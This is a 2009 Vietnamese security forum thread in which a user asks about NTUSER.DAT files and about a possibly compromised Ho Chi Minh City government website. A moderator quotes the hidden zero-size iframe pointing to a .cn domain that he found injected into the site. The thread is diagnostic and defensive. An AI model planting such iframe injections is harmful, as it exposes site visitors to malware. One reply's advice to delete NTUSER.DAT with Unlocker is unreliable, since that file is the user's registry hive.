banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Xem giúp em đây là file gì  XML
  [Question]   Xem giúp em đây là file gì 19/06/2009 22:47:46 (+0700) | #1 | 184052
marken
Member

[Minus]    0    [Plus]
Joined: 18/06/2009 23:39:22
Messages: 6
Offline
[Profile] [PM]
Hôm qua mở laptop lên thì thấy 2 file này trong My document: NTuser.dat.log và NT.user.dat Xin hỏi đây có phải là virus hay trojan gì không? Lúc em xóa thì nó hiện lên thông báo là đang được sử dụng bởi 1 chương trình nào đó.Em mún xóa thì làm cách nào?
Các anh kiểm tra dùm em trang web sở kế hoạch thành phố hồ chí minh có bị virus ko,em mở thì firefox bảo là trang web đó bị cái trang "gì đó.cn" attack,em thường vào trang đó nên sợ máy bị tấn công
[Up] [Print Copy]
  [Question]   Xem giúp em đây là file gì 20/06/2009 13:42:26 (+0700) | #2 | 184126
No.13
Moderator

Joined: 25/08/2003 22:07:38
Messages: 500
Offline
[Profile] [PM]
Bạn có thể dùng Process Monitor hay File Monitor để tìm 2 file đó đang được truy cập bởi chương trình nào.
[Up] [Print Copy]
  [Question]   Xem giúp em đây là file gì 20/06/2009 13:45:47 (+0700) | #3 | 184127
bomviet
Member

[Minus]    0    [Plus]
Joined: 02/05/2009 22:44:33
Messages: 1
Offline
[Profile] [PM]
Đó không phải virus đâu bạn
bạn dùng unlocker xóa nó đi nha
^^
[Up] [Print Copy]
  [Question]   Xem giúp em đây là file gì 20/06/2009 14:11:43 (+0700) | #4 | 184130
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

marken wrote:

...
Các anh kiểm tra dùm em trang web sở kế hoạch thành phố hồ chí minh có bị virus ko,em mở thì firefox bảo là trang web đó bị cái trang "gì đó.cn" attack,em thường vào trang đó nên sợ máy bị tấn công 

Mình không rành "món" này lắm, nhưng mình thử:
- wget http://www.dpi.hochiminhcity.gov.vn/
- mousepad index.html

thì được:
<iframe src=http://www.boxing.net.cn/about width=0 height=0></Iframe> 


Như vậy tạm thời bạn không nên vào website này. Đọc thêm về loại mã độc này với một số từ khoá như: "iframe malicious", "website bị chèn iframe", ...

PS: Bạn nhớ tìm lại trên diễn đàn nhé, có một vài chủ đề từng thảo luận rồi đấy.
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Xem giúp em đây là file gì 21/06/2009 09:13:39 (+0700) | #5 | 184202
marken
Member

[Minus]    0    [Plus]
Joined: 18/06/2009 23:39:22
Messages: 6
Offline
[Profile] [PM]
Cám ơn các bạn nhiều
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|